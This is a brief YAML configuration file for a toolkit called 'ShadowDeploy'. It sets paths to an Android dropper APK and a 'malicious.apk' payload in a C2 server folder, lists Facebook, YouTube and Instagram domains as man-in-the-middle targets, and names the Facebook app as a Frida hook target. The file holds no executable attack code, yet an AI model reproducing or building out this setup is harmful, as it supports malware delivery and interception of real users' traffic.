# Configuración Global ShadowDeploy
server:
  host: "0.0.0.0"
  port: 8080

android:
  package: "com.pentest.dropper"
  dropper: "3_c2_server/payloads/dropper.apk"
  payload: "3_c2_server/payloads/malicious.apk"

mitm:
  targets: ["facebook.com", "youtube.com", "instagram.com", "fbcdn.net"]

frida:
  target_app: "com.facebook.katana"